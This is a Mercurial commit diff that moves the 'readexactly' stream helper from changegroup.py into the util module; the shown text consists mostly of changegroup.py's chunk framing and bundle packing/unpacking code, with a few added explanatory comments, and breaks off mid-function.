util: move 'readexactly' into the util module...
Boris Feld
r35772:fb0be099 default
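The patch touches two files: mercurial/changegroup.py, where the module-local readexactly helper is deleted and rebound to the util version, and mercurial/util.py, which gains the function (the util.py hunk shown below ends before the new definition appears). Based on the removed lines, the relocated helper presumably reads as follows; its exact placement inside util.py is an assumption, but `error` and `_` are already available in that module's namespace:

    def readexactly(stream, n):
        '''read n bytes from stream.read and abort if less was available'''
        s = stream.read(n)
        if len(s) < n:
            raise error.Abort(_("stream ended unexpectedly"
                                " (got %d bytes, expected %d)")
                              % (len(s), n))
        return s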
mercurial/changegroup.py
@@ -1,1003 +1,996 @@
1 1 # changegroup.py - Mercurial changegroup manipulation functions
2 2 #
3 3 # Copyright 2006 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import struct
12 12 import tempfile
13 13 import weakref
14 14
15 15 from .i18n import _
16 16 from .node import (
17 17 hex,
18 18 nullrev,
19 19 short,
20 20 )
21 21
22 22 from . import (
23 23 dagutil,
24 24 error,
25 25 mdiff,
26 26 phases,
27 27 pycompat,
28 28 util,
29 29 )
30 30
31 31 _CHANGEGROUPV1_DELTA_HEADER = "20s20s20s20s"
32 32 _CHANGEGROUPV2_DELTA_HEADER = "20s20s20s20s20s"
33 33 _CHANGEGROUPV3_DELTA_HEADER = ">20s20s20s20s20sH"
34 34
35 def readexactly(stream, n):
36 '''read n bytes from stream.read and abort if less was available'''
37 s = stream.read(n)
38 if len(s) < n:
39 raise error.Abort(_("stream ended unexpectedly"
40 " (got %d bytes, expected %d)")
41 % (len(s), n))
42 return s
35 readexactly = util.readexactly
43 36
44 37 def getchunk(stream):
45 38 """return the next chunk from stream as a string"""
46 39 d = readexactly(stream, 4)
47 40 l = struct.unpack(">l", d)[0]
48 41 if l <= 4:
49 42 if l:
50 43 raise error.Abort(_("invalid chunk length %d") % l)
51 44 return ""
52 45 return readexactly(stream, l - 4)
53 46
54 47 def chunkheader(length):
55 48 """return a changegroup chunk header (string)"""
56 49 return struct.pack(">l", length + 4)
57 50
58 51 def closechunk():
59 52 """return a changegroup chunk header (string) for a zero-length chunk"""
60 53 return struct.pack(">l", 0)
61 54
62 55 def writechunks(ui, chunks, filename, vfs=None):
63 56 """Write chunks to a file and return its filename.
64 57
65 58 The stream is assumed to be a bundle file.
66 59 Existing files will not be overwritten.
67 60 If no filename is specified, a temporary file is created.
68 61 """
69 62 fh = None
70 63 cleanup = None
71 64 try:
72 65 if filename:
73 66 if vfs:
74 67 fh = vfs.open(filename, "wb")
75 68 else:
76 69 # Increase default buffer size because default is usually
77 70 # small (4k is common on Linux).
78 71 fh = open(filename, "wb", 131072)
79 72 else:
80 73 fd, filename = tempfile.mkstemp(prefix="hg-bundle-", suffix=".hg")
81 74 fh = os.fdopen(fd, pycompat.sysstr("wb"))
82 75 cleanup = filename
83 76 for c in chunks:
84 77 fh.write(c)
85 78 cleanup = None
86 79 return filename
87 80 finally:
88 81 if fh is not None:
89 82 fh.close()
90 83 if cleanup is not None:
91 84 if filename and vfs:
92 85 vfs.unlink(cleanup)
93 86 else:
94 87 os.unlink(cleanup)
95 88
96 89 class cg1unpacker(object):
97 90 """Unpacker for cg1 changegroup streams.
98 91
99 92 A changegroup unpacker handles the framing of the revision data in
100 93 the wire format. Most consumers will want to use the apply()
101 94 method to add the changes from the changegroup to a repository.
102 95
103 96 If you're forwarding a changegroup unmodified to another consumer,
104 97 use getchunks(), which returns an iterator of changegroup
105 98 chunks. This is mostly useful for cases where you need to know the
106 99 data stream has ended by observing the end of the changegroup.
107 100
108 101 deltachunk() is useful only if you're applying delta data. Most
109 102 consumers should prefer apply() instead.
110 103
111 104 A few other public methods exist. Those are used only for
112 105 bundlerepo and some debug commands - their use is discouraged.
113 106 """
114 107 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
115 108 deltaheadersize = struct.calcsize(deltaheader)
116 109 version = '01'
117 110 _grouplistcount = 1 # One list of files after the manifests
118 111
119 112 def __init__(self, fh, alg, extras=None):
120 113 if alg is None:
121 114 alg = 'UN'
122 115 if alg not in util.compengines.supportedbundletypes:
123 116 raise error.Abort(_('unknown stream compression type: %s')
124 117 % alg)
125 118 if alg == 'BZ':
126 119 alg = '_truncatedBZ'
127 120
128 121 compengine = util.compengines.forbundletype(alg)
129 122 self._stream = compengine.decompressorreader(fh)
130 123 self._type = alg
131 124 self.extras = extras or {}
132 125 self.callback = None
133 126
134 127 # These methods (compressed, read, seek, tell) all appear to only
135 128 # be used by bundlerepo, but it's a little hard to tell.
136 129 def compressed(self):
137 130 return self._type is not None and self._type != 'UN'
138 131 def read(self, l):
139 132 return self._stream.read(l)
140 133 def seek(self, pos):
141 134 return self._stream.seek(pos)
142 135 def tell(self):
143 136 return self._stream.tell()
144 137 def close(self):
145 138 return self._stream.close()
146 139
147 140 def _chunklength(self):
148 141 d = readexactly(self._stream, 4)
149 142 l = struct.unpack(">l", d)[0]
150 143 if l <= 4:
151 144 if l:
152 145 raise error.Abort(_("invalid chunk length %d") % l)
153 146 return 0
154 147 if self.callback:
155 148 self.callback()
156 149 return l - 4
157 150
158 151 def changelogheader(self):
159 152 """v10 does not have a changelog header chunk"""
160 153 return {}
161 154
162 155 def manifestheader(self):
163 156 """v10 does not have a manifest header chunk"""
164 157 return {}
165 158
166 159 def filelogheader(self):
167 160 """return the header of the filelogs chunk, v10 only has the filename"""
168 161 l = self._chunklength()
169 162 if not l:
170 163 return {}
171 164 fname = readexactly(self._stream, l)
172 165 return {'filename': fname}
173 166
174 167 def _deltaheader(self, headertuple, prevnode):
175 168 node, p1, p2, cs = headertuple
176 169 if prevnode is None:
177 170 deltabase = p1
178 171 else:
179 172 deltabase = prevnode
180 173 flags = 0
181 174 return node, p1, p2, deltabase, cs, flags
182 175
183 176 def deltachunk(self, prevnode):
184 177 l = self._chunklength()
185 178 if not l:
186 179 return {}
187 180 headerdata = readexactly(self._stream, self.deltaheadersize)
188 181 header = struct.unpack(self.deltaheader, headerdata)
189 182 delta = readexactly(self._stream, l - self.deltaheadersize)
190 183 node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
191 184 return (node, p1, p2, cs, deltabase, delta, flags)
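The three delta header formats declared at the top of the file are fixed-size struct layouts, which is what deltaheadersize captures and what deltachunk reads before the delta payload. A doctest-style check (an illustration, not part of the patch):

    >>> import struct
    >>> struct.calcsize("20s20s20s20s")       # cg1: node, p1, p2, cs
    80
    >>> struct.calcsize("20s20s20s20s20s")    # cg2 adds the delta base node
    100
    >>> struct.calcsize(">20s20s20s20s20sH")  # cg3 adds a 16-bit flags field
    102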
192 185
193 186 def getchunks(self):
194 187 """returns all the chunks contains in the bundle
195 188
196 189 Used when you need to forward the binary stream to a file or another
197 190 network API. To do so, it parse the changegroup data, otherwise it will
198 191 block in case of sshrepo because it don't know the end of the stream.
199 192 """
200 193 # For changegroup 1 and 2, we expect 3 parts: changelog, manifestlog,
201 194 # and a list of filelogs. For changegroup 3, we expect 4 parts:
202 195 # changelog, manifestlog, a list of tree manifestlogs, and a list of
203 196 # filelogs.
204 197 #
205 198 # Changelog and manifestlog parts are terminated with empty chunks. The
206 199 # tree and file parts are a list of entry sections. Each entry section
207 200 # is a series of chunks terminating in an empty chunk. The list of these
208 201 # entry sections is terminated in yet another empty chunk, so we know
209 202 # we've reached the end of the tree/file list when we reach an empty
210 203 # chunk that was preceded by no non-empty chunks.
211 204
212 205 parts = 0
213 206 while parts < 2 + self._grouplistcount:
214 207 noentries = True
215 208 while True:
216 209 chunk = getchunk(self)
217 210 if not chunk:
218 211 # The first two empty chunks represent the end of the
219 212 # changelog and the manifestlog portions. The remaining
220 213 # empty chunks represent either A) the end of individual
221 214 # tree or file entries in the file list, or B) the end of
222 215 # the entire list. It's the end of the entire list if there
223 216 # were no entries (i.e. noentries is True).
224 217 if parts < 2:
225 218 parts += 1
226 219 elif noentries:
227 220 parts += 1
228 221 break
229 222 noentries = False
230 223 yield chunkheader(len(chunk))
231 224 pos = 0
232 225 while pos < len(chunk):
233 226 next = pos + 2**20
234 227 yield chunk[pos:next]
235 228 pos = next
236 229 yield closechunk()
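To make the framing that getchunk, chunkheader and closechunk implement concrete (the 4-byte length prefix counts itself, and a zero-length chunk terminates a group), here is a small illustrative round trip; it is a sketch, not part of the patch, and uses only names visible in this file plus util.stringio:

    >>> from mercurial import changegroup, util
    >>> data = changegroup.chunkheader(3) + 'abc' + changegroup.closechunk()
    >>> stream = util.stringio(data)
    >>> changegroup.getchunk(stream)
    'abc'
    >>> changegroup.getchunk(stream)    # the empty chunk ends the group
    ''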
237 230
238 231 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
239 232 # We know that we'll never have more manifests than we had
240 233 # changesets.
241 234 self.callback = prog(_('manifests'), numchanges)
242 235 # no need to check for empty manifest group here:
243 236 # if the result of the merge of 1 and 2 is the same in 3 and 4,
244 237 # no new manifest will be created and the manifest group will
245 238 # be empty during the pull
246 239 self.manifestheader()
247 240 deltas = self.deltaiter()
248 241 repo.manifestlog._revlog.addgroup(deltas, revmap, trp)
249 242 repo.ui.progress(_('manifests'), None)
250 243 self.callback = None
251 244
252 245 def apply(self, repo, tr, srctype, url, targetphase=phases.draft,
253 246 expectedtotal=None):
254 247 """Add the changegroup returned by source.read() to this repo.
255 248 srctype is a string like 'push', 'pull', or 'unbundle'. url is
256 249 the URL of the repo where this changegroup is coming from.
257 250
258 251 Return an integer summarizing the change to this repo:
259 252 - nothing changed or no source: 0
260 253 - more heads than before: 1+added heads (2..n)
261 254 - fewer heads than before: -1-removed heads (-2..-n)
262 255 - number of heads stays the same: 1
263 256 """
264 257 repo = repo.unfiltered()
265 258 def csmap(x):
266 259 repo.ui.debug("add changeset %s\n" % short(x))
267 260 return len(cl)
268 261
269 262 def revmap(x):
270 263 return cl.rev(x)
271 264
272 265 changesets = files = revisions = 0
273 266
274 267 try:
275 268 # The transaction may already carry source information. In this
276 269 # case we use the top level data. We overwrite the argument
277 270 # because we need to use the top level value (if they exist)
278 271 # in this function.
279 272 srctype = tr.hookargs.setdefault('source', srctype)
280 273 url = tr.hookargs.setdefault('url', url)
281 274 repo.hook('prechangegroup',
282 275 throw=True, **pycompat.strkwargs(tr.hookargs))
283 276
284 277 # write changelog data to temp files so concurrent readers
285 278 # will not see an inconsistent view
286 279 cl = repo.changelog
287 280 cl.delayupdate(tr)
288 281 oldheads = set(cl.heads())
289 282
290 283 trp = weakref.proxy(tr)
291 284 # pull off the changeset group
292 285 repo.ui.status(_("adding changesets\n"))
293 286 clstart = len(cl)
294 287 class prog(object):
295 288 def __init__(self, step, total):
296 289 self._step = step
297 290 self._total = total
298 291 self._count = 1
299 292 def __call__(self):
300 293 repo.ui.progress(self._step, self._count, unit=_('chunks'),
301 294 total=self._total)
302 295 self._count += 1
303 296 self.callback = prog(_('changesets'), expectedtotal)
304 297
305 298 efiles = set()
306 299 def onchangelog(cl, node):
307 300 efiles.update(cl.readfiles(node))
308 301
309 302 self.changelogheader()
310 303 deltas = self.deltaiter()
311 304 cgnodes = cl.addgroup(deltas, csmap, trp, addrevisioncb=onchangelog)
312 305 efiles = len(efiles)
313 306
314 307 if not cgnodes:
315 308 repo.ui.develwarn('applied empty changegroup',
316 309 config='warn-empty-changegroup')
317 310 clend = len(cl)
318 311 changesets = clend - clstart
319 312 repo.ui.progress(_('changesets'), None)
320 313 self.callback = None
321 314
322 315 # pull off the manifest group
323 316 repo.ui.status(_("adding manifests\n"))
324 317 self._unpackmanifests(repo, revmap, trp, prog, changesets)
325 318
326 319 needfiles = {}
327 320 if repo.ui.configbool('server', 'validate'):
328 321 cl = repo.changelog
329 322 ml = repo.manifestlog
330 323 # validate incoming csets have their manifests
331 324 for cset in xrange(clstart, clend):
332 325 mfnode = cl.changelogrevision(cset).manifest
333 326 mfest = ml[mfnode].readdelta()
334 327 # store file cgnodes we must see
335 328 for f, n in mfest.iteritems():
336 329 needfiles.setdefault(f, set()).add(n)
337 330
338 331 # process the files
339 332 repo.ui.status(_("adding file changes\n"))
340 333 newrevs, newfiles = _addchangegroupfiles(
341 334 repo, self, revmap, trp, efiles, needfiles)
342 335 revisions += newrevs
343 336 files += newfiles
344 337
345 338 deltaheads = 0
346 339 if oldheads:
347 340 heads = cl.heads()
348 341 deltaheads = len(heads) - len(oldheads)
349 342 for h in heads:
350 343 if h not in oldheads and repo[h].closesbranch():
351 344 deltaheads -= 1
352 345 htext = ""
353 346 if deltaheads:
354 347 htext = _(" (%+d heads)") % deltaheads
355 348
356 349 repo.ui.status(_("added %d changesets"
357 350 " with %d changes to %d files%s\n")
358 351 % (changesets, revisions, files, htext))
359 352 repo.invalidatevolatilesets()
360 353
361 354 if changesets > 0:
362 355 if 'node' not in tr.hookargs:
363 356 tr.hookargs['node'] = hex(cl.node(clstart))
364 357 tr.hookargs['node_last'] = hex(cl.node(clend - 1))
365 358 hookargs = dict(tr.hookargs)
366 359 else:
367 360 hookargs = dict(tr.hookargs)
368 361 hookargs['node'] = hex(cl.node(clstart))
369 362 hookargs['node_last'] = hex(cl.node(clend - 1))
370 363 repo.hook('pretxnchangegroup',
371 364 throw=True, **pycompat.strkwargs(hookargs))
372 365
373 366 added = [cl.node(r) for r in xrange(clstart, clend)]
374 367 phaseall = None
375 368 if srctype in ('push', 'serve'):
376 369 # Old servers can not push the boundary themselves.
377 370 # New servers won't push the boundary if changeset already
378 371 # exists locally as secret
379 372 #
380 373 # We should not use 'added' here but the list of all changes in
381 374 # the bundle
382 375 if repo.publishing():
383 376 targetphase = phaseall = phases.public
384 377 else:
385 378 # closer target phase computation
386 379
387 380 # Those changesets have been pushed from the
388 381 # outside, their phases are going to be pushed
389 382 alongside. Therefore `targetphase` is
390 383 # ignored.
391 384 targetphase = phaseall = phases.draft
392 385 if added:
393 386 phases.registernew(repo, tr, targetphase, added)
394 387 if phaseall is not None:
395 388 phases.advanceboundary(repo, tr, phaseall, cgnodes)
396 389
397 390 if changesets > 0:
398 391
399 392 def runhooks():
400 393 # These hooks run when the lock releases, not when the
401 394 # transaction closes. So it's possible for the changelog
402 395 # to have changed since we last saw it.
403 396 if clstart >= len(repo):
404 397 return
405 398
406 399 repo.hook("changegroup", **pycompat.strkwargs(hookargs))
407 400
408 401 for n in added:
409 402 args = hookargs.copy()
410 403 args['node'] = hex(n)
411 404 del args['node_last']
412 405 repo.hook("incoming", **pycompat.strkwargs(args))
413 406
414 407 newheads = [h for h in repo.heads()
415 408 if h not in oldheads]
416 409 repo.ui.log("incoming",
417 410 "%s incoming changes - new heads: %s\n",
418 411 len(added),
419 412 ', '.join([hex(c[:6]) for c in newheads]))
420 413
421 414 tr.addpostclose('changegroup-runhooks-%020i' % clstart,
422 415 lambda tr: repo._afterlock(runhooks))
423 416 finally:
424 417 repo.ui.flush()
425 418 # never return 0 here:
426 419 if deltaheads < 0:
427 420 ret = deltaheads - 1
428 421 else:
429 422 ret = deltaheads + 1
430 423 return ret
431 424
432 425 def deltaiter(self):
433 426 """
434 427 returns an iterator of the deltas in this changegroup
435 428
436 429 Useful for passing to the underlying storage system to be stored.
437 430 """
438 431 chain = None
439 432 for chunkdata in iter(lambda: self.deltachunk(chain), {}):
440 433 # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
441 434 yield chunkdata
442 435 chain = chunkdata[0]
443 436
444 437 class cg2unpacker(cg1unpacker):
445 438 """Unpacker for cg2 streams.
446 439
447 440 cg2 streams add support for generaldelta, so the delta header
448 441 format is slightly different. All other features about the data
449 442 remain the same.
450 443 """
451 444 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
452 445 deltaheadersize = struct.calcsize(deltaheader)
453 446 version = '02'
454 447
455 448 def _deltaheader(self, headertuple, prevnode):
456 449 node, p1, p2, deltabase, cs = headertuple
457 450 flags = 0
458 451 return node, p1, p2, deltabase, cs, flags
459 452
460 453 class cg3unpacker(cg2unpacker):
461 454 """Unpacker for cg3 streams.
462 455
463 456 cg3 streams add support for exchanging treemanifests and revlog
464 457 flags. It adds the revlog flags to the delta header and an empty chunk
465 458 separating manifests and files.
466 459 """
467 460 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
468 461 deltaheadersize = struct.calcsize(deltaheader)
469 462 version = '03'
470 463 _grouplistcount = 2 # One list of manifests and one list of files
471 464
472 465 def _deltaheader(self, headertuple, prevnode):
473 466 node, p1, p2, deltabase, cs, flags = headertuple
474 467 return node, p1, p2, deltabase, cs, flags
475 468
476 469 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
477 470 super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog,
478 471 numchanges)
479 472 for chunkdata in iter(self.filelogheader, {}):
480 473 # If we get here, there are directory manifests in the changegroup
481 474 d = chunkdata["filename"]
482 475 repo.ui.debug("adding %s revisions\n" % d)
483 476 dirlog = repo.manifestlog._revlog.dirlog(d)
484 477 deltas = self.deltaiter()
485 478 if not dirlog.addgroup(deltas, revmap, trp):
486 479 raise error.Abort(_("received dir revlog group is empty"))
487 480
488 481 class headerlessfixup(object):
489 482 def __init__(self, fh, h):
490 483 self._h = h
491 484 self._fh = fh
492 485 def read(self, n):
493 486 if self._h:
494 487 d, self._h = self._h[:n], self._h[n:]
495 488 if len(d) < n:
496 489 d += readexactly(self._fh, n - len(d))
497 490 return d
498 491 return readexactly(self._fh, n)
499 492
500 493 class cg1packer(object):
501 494 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
502 495 version = '01'
503 496 def __init__(self, repo, bundlecaps=None):
504 497 """Given a source repo, construct a bundler.
505 498
506 499 bundlecaps is optional and can be used to specify the set of
507 500 capabilities which can be used to build the bundle. While bundlecaps is
508 501 unused in core Mercurial, extensions rely on this feature to communicate
509 502 capabilities to customize the changegroup packer.
510 503 """
511 504 # Set of capabilities we can use to build the bundle.
512 505 if bundlecaps is None:
513 506 bundlecaps = set()
514 507 self._bundlecaps = bundlecaps
515 508 # experimental config: bundle.reorder
516 509 reorder = repo.ui.config('bundle', 'reorder')
517 510 if reorder == 'auto':
518 511 reorder = None
519 512 else:
520 513 reorder = util.parsebool(reorder)
521 514 self._repo = repo
522 515 self._reorder = reorder
523 516 self._progress = repo.ui.progress
524 517 if self._repo.ui.verbose and not self._repo.ui.debugflag:
525 518 self._verbosenote = self._repo.ui.note
526 519 else:
527 520 self._verbosenote = lambda s: None
528 521
529 522 def close(self):
530 523 return closechunk()
531 524
532 525 def fileheader(self, fname):
533 526 return chunkheader(len(fname)) + fname
534 527
535 528 # Extracted both for clarity and for overriding in extensions.
536 529 def _sortgroup(self, revlog, nodelist, lookup):
537 530 """Sort nodes for change group and turn them into revnums."""
538 531 # for generaldelta revlogs, we linearize the revs; this will both be
539 532 # much quicker and generate a much smaller bundle
540 533 if (revlog._generaldelta and self._reorder is None) or self._reorder:
541 534 dag = dagutil.revlogdag(revlog)
542 535 return dag.linearize(set(revlog.rev(n) for n in nodelist))
543 536 else:
544 537 return sorted([revlog.rev(n) for n in nodelist])
545 538
546 539 def group(self, nodelist, revlog, lookup, units=None):
547 540 """Calculate a delta group, yielding a sequence of changegroup chunks
548 541 (strings).
549 542
550 543 Given a list of changeset revs, return a set of deltas and
551 544 metadata corresponding to nodes. The first delta is
552 545 first parent(nodelist[0]) -> nodelist[0], the receiver is
553 546 guaranteed to have this parent as it has all history before
554 547 these changesets. In the case firstparent is nullrev the
555 548 changegroup starts with a full revision.
556 549
557 550 If units is not None, progress detail will be generated; units specifies
558 551 the type of revlog that is touched (changelog, manifest, etc.).
559 552 """
560 553 # if we don't have any revisions touched by these changesets, bail
561 554 if len(nodelist) == 0:
562 555 yield self.close()
563 556 return
564 557
565 558 revs = self._sortgroup(revlog, nodelist, lookup)
566 559
567 560 # add the parent of the first rev
568 561 p = revlog.parentrevs(revs[0])[0]
569 562 revs.insert(0, p)
570 563
571 564 # build deltas
572 565 total = len(revs) - 1
573 566 msgbundling = _('bundling')
574 567 for r in xrange(len(revs) - 1):
575 568 if units is not None:
576 569 self._progress(msgbundling, r + 1, unit=units, total=total)
577 570 prev, curr = revs[r], revs[r + 1]
578 571 linknode = lookup(revlog.node(curr))
579 572 for c in self.revchunk(revlog, curr, prev, linknode):
580 573 yield c
581 574
582 575 if units is not None:
583 576 self._progress(msgbundling, None)
584 577 yield self.close()
585 578
586 579 # filter any nodes that claim to be part of the known set
587 580 def prune(self, revlog, missing, commonrevs):
588 581 rr, rl = revlog.rev, revlog.linkrev
589 582 return [n for n in missing if rl(rr(n)) not in commonrevs]
590 583
591 584 def _packmanifests(self, dir, mfnodes, lookuplinknode):
592 585 """Pack flat manifests into a changegroup stream."""
593 586 assert not dir
594 587 for chunk in self.group(mfnodes, self._repo.manifestlog._revlog,
595 588 lookuplinknode, units=_('manifests')):
596 589 yield chunk
597 590
598 591 def _manifestsdone(self):
599 592 return ''
600 593
601 594 def generate(self, commonrevs, clnodes, fastpathlinkrev, source):
602 595 '''yield a sequence of changegroup chunks (strings)'''
603 596 repo = self._repo
604 597 cl = repo.changelog
605 598
606 599 clrevorder = {}
607 600 mfs = {} # needed manifests
608 601 fnodes = {} # needed file nodes
609 602 changedfiles = set()
610 603
611 604 # Callback for the changelog, used to collect changed files and manifest
612 605 # nodes.
613 606 # Returns the linkrev node (identity in the changelog case).
614 607 def lookupcl(x):
615 608 c = cl.read(x)
616 609 clrevorder[x] = len(clrevorder)
617 610 n = c[0]
618 611 # record the first changeset introducing this manifest version
619 612 mfs.setdefault(n, x)
620 613 # Record a complete list of potentially-changed files in
621 614 # this manifest.
622 615 changedfiles.update(c[3])
623 616 return x
624 617
625 618 self._verbosenote(_('uncompressed size of bundle content:\n'))
626 619 size = 0
627 620 for chunk in self.group(clnodes, cl, lookupcl, units=_('changesets')):
628 621 size += len(chunk)
629 622 yield chunk
630 623 self._verbosenote(_('%8.i (changelog)\n') % size)
631 624
632 625 # We need to make sure that the linkrev in the changegroup refers to
633 626 # the first changeset that introduced the manifest or file revision.
634 627 # The fastpath is usually safer than the slowpath, because the filelogs
635 628 # are walked in revlog order.
636 629 #
637 630 # When taking the slowpath with reorder=None and the manifest revlog
638 631 # uses generaldelta, the manifest may be walked in the "wrong" order.
639 632 # Without 'clrevorder', we would get an incorrect linkrev (see fix in
640 633 # cc0ff93d0c0c).
641 634 #
642 635 # When taking the fastpath, we are only vulnerable to reordering
643 636 # of the changelog itself. The changelog never uses generaldelta, so
644 637 # it is only reordered when reorder=True. To handle this case, we
645 638 # simply take the slowpath, which already has the 'clrevorder' logic.
646 639 # This was also fixed in cc0ff93d0c0c.
647 640 fastpathlinkrev = fastpathlinkrev and not self._reorder
648 641 # Treemanifests don't work correctly with fastpathlinkrev
649 642 # either, because we don't discover which directory nodes to
650 643 # send along with files. This could probably be fixed.
651 644 fastpathlinkrev = fastpathlinkrev and (
652 645 'treemanifest' not in repo.requirements)
653 646
654 647 for chunk in self.generatemanifests(commonrevs, clrevorder,
655 648 fastpathlinkrev, mfs, fnodes, source):
656 649 yield chunk
657 650 mfs.clear()
658 651 clrevs = set(cl.rev(x) for x in clnodes)
659 652
660 653 if not fastpathlinkrev:
661 654 def linknodes(unused, fname):
662 655 return fnodes.get(fname, {})
663 656 else:
664 657 cln = cl.node
665 658 def linknodes(filerevlog, fname):
666 659 llr = filerevlog.linkrev
667 660 fln = filerevlog.node
668 661 revs = ((r, llr(r)) for r in filerevlog)
669 662 return dict((fln(r), cln(lr)) for r, lr in revs if lr in clrevs)
670 663
671 664 for chunk in self.generatefiles(changedfiles, linknodes, commonrevs,
672 665 source):
673 666 yield chunk
674 667
675 668 yield self.close()
676 669
677 670 if clnodes:
678 671 repo.hook('outgoing', node=hex(clnodes[0]), source=source)
679 672
680 673 def generatemanifests(self, commonrevs, clrevorder, fastpathlinkrev, mfs,
681 674 fnodes, source):
682 675 """Returns an iterator of changegroup chunks containing manifests.
683 676
684 677 `source` is unused here, but is used by extensions like remotefilelog to
685 678 change what is sent based on pulls vs. pushes, etc.
686 679 """
687 680 repo = self._repo
688 681 mfl = repo.manifestlog
689 682 dirlog = mfl._revlog.dirlog
690 683 tmfnodes = {'': mfs}
691 684
692 685 # Callback for the manifest, used to collect linkrevs for filelog
693 686 # revisions.
694 687 # Returns the linkrev node (collected in lookupcl).
695 688 def makelookupmflinknode(dir, nodes):
696 689 if fastpathlinkrev:
697 690 assert not dir
698 691 return mfs.__getitem__
699 692
700 693 def lookupmflinknode(x):
701 694 """Callback for looking up the linknode for manifests.
702 695
703 696 Returns the linkrev node for the specified manifest.
704 697
705 698 SIDE EFFECT:
706 699
707 700 1) fclnodes gets populated with the list of relevant
708 701 file nodes if we're not using fastpathlinkrev
709 702 2) When treemanifests are in use, collects treemanifest nodes
710 703 to send
711 704
712 705 Note that this means manifests must be completely sent to
713 706 the client before you can trust the list of files and
714 707 treemanifests to send.
715 708 """
716 709 clnode = nodes[x]
717 710 mdata = mfl.get(dir, x).readfast(shallow=True)
718 711 for p, n, fl in mdata.iterentries():
719 712 if fl == 't': # subdirectory manifest
720 713 subdir = dir + p + '/'
721 714 tmfclnodes = tmfnodes.setdefault(subdir, {})
722 715 tmfclnode = tmfclnodes.setdefault(n, clnode)
723 716 if clrevorder[clnode] < clrevorder[tmfclnode]:
724 717 tmfclnodes[n] = clnode
725 718 else:
726 719 f = dir + p
727 720 fclnodes = fnodes.setdefault(f, {})
728 721 fclnode = fclnodes.setdefault(n, clnode)
729 722 if clrevorder[clnode] < clrevorder[fclnode]:
730 723 fclnodes[n] = clnode
731 724 return clnode
732 725 return lookupmflinknode
733 726
734 727 size = 0
735 728 while tmfnodes:
736 729 dir, nodes = tmfnodes.popitem()
737 730 prunednodes = self.prune(dirlog(dir), nodes, commonrevs)
738 731 if not dir or prunednodes:
739 732 for x in self._packmanifests(dir, prunednodes,
740 733 makelookupmflinknode(dir, nodes)):
741 734 size += len(x)
742 735 yield x
743 736 self._verbosenote(_('%8.i (manifests)\n') % size)
744 737 yield self._manifestsdone()
745 738
746 739 # The 'source' parameter is useful for extensions
747 740 def generatefiles(self, changedfiles, linknodes, commonrevs, source):
748 741 repo = self._repo
749 742 progress = self._progress
750 743 msgbundling = _('bundling')
751 744
752 745 total = len(changedfiles)
753 746 # for progress output
754 747 msgfiles = _('files')
755 748 for i, fname in enumerate(sorted(changedfiles)):
756 749 filerevlog = repo.file(fname)
757 750 if not filerevlog:
758 751 raise error.Abort(_("empty or missing revlog for %s") % fname)
759 752
760 753 linkrevnodes = linknodes(filerevlog, fname)
761 754 # Lookup for filenodes, we collected the linkrev nodes above in the
762 755 # fastpath case and with lookupmf in the slowpath case.
763 756 def lookupfilelog(x):
764 757 return linkrevnodes[x]
765 758
766 759 filenodes = self.prune(filerevlog, linkrevnodes, commonrevs)
767 760 if filenodes:
768 761 progress(msgbundling, i + 1, item=fname, unit=msgfiles,
769 762 total=total)
770 763 h = self.fileheader(fname)
771 764 size = len(h)
772 765 yield h
773 766 for chunk in self.group(filenodes, filerevlog, lookupfilelog):
774 767 size += len(chunk)
775 768 yield chunk
776 769 self._verbosenote(_('%8.i %s\n') % (size, fname))
777 770 progress(msgbundling, None)
778 771
779 772 def deltaparent(self, revlog, rev, p1, p2, prev):
780 773 return prev
781 774
782 775 def revchunk(self, revlog, rev, prev, linknode):
783 776 node = revlog.node(rev)
784 777 p1, p2 = revlog.parentrevs(rev)
785 778 base = self.deltaparent(revlog, rev, p1, p2, prev)
786 779
787 780 prefix = ''
788 781 if revlog.iscensored(base) or revlog.iscensored(rev):
789 782 try:
790 783 delta = revlog.revision(node, raw=True)
791 784 except error.CensoredNodeError as e:
792 785 delta = e.tombstone
793 786 if base == nullrev:
794 787 prefix = mdiff.trivialdiffheader(len(delta))
795 788 else:
796 789 baselen = revlog.rawsize(base)
797 790 prefix = mdiff.replacediffheader(baselen, len(delta))
798 791 elif base == nullrev:
799 792 delta = revlog.revision(node, raw=True)
800 793 prefix = mdiff.trivialdiffheader(len(delta))
801 794 else:
802 795 delta = revlog.revdiff(base, rev)
803 796 p1n, p2n = revlog.parents(node)
804 797 basenode = revlog.node(base)
805 798 flags = revlog.flags(rev)
806 799 meta = self.builddeltaheader(node, p1n, p2n, basenode, linknode, flags)
807 800 meta += prefix
808 801 l = len(meta) + len(delta)
809 802 yield chunkheader(l)
810 803 yield meta
811 804 yield delta
812 805 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
813 806 # do nothing with basenode, it is implicitly the previous one in HG10
814 807 # do nothing with flags, it is implicitly 0 for cg1 and cg2
815 808 return struct.pack(self.deltaheader, node, p1n, p2n, linknode)
816 809
817 810 class cg2packer(cg1packer):
818 811 version = '02'
819 812 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
820 813
821 814 def __init__(self, repo, bundlecaps=None):
822 815 super(cg2packer, self).__init__(repo, bundlecaps)
823 816 if self._reorder is None:
824 817 # Since generaldelta is directly supported by cg2, reordering
825 818 # generally doesn't help, so we disable it by default (treating
826 819 # bundle.reorder=auto just like bundle.reorder=False).
827 820 self._reorder = False
828 821
829 822 def deltaparent(self, revlog, rev, p1, p2, prev):
830 823 dp = revlog.deltaparent(rev)
831 824 if dp == nullrev and revlog.storedeltachains:
832 825 # Avoid sending full revisions when delta parent is null. Pick prev
833 826 # in that case. It's tempting to pick p1 in this case, as p1 will
834 827 # be smaller in the common case. However, computing a delta against
835 828 # p1 may require resolving the raw text of p1, which could be
836 829 # expensive. The revlog caches should have prev cached, meaning
837 830 # less CPU for changegroup generation. There is likely room to add
838 831 # a flag and/or config option to control this behavior.
839 832 return prev
840 833 elif dp == nullrev:
841 834 # revlog is configured to use full snapshot for a reason,
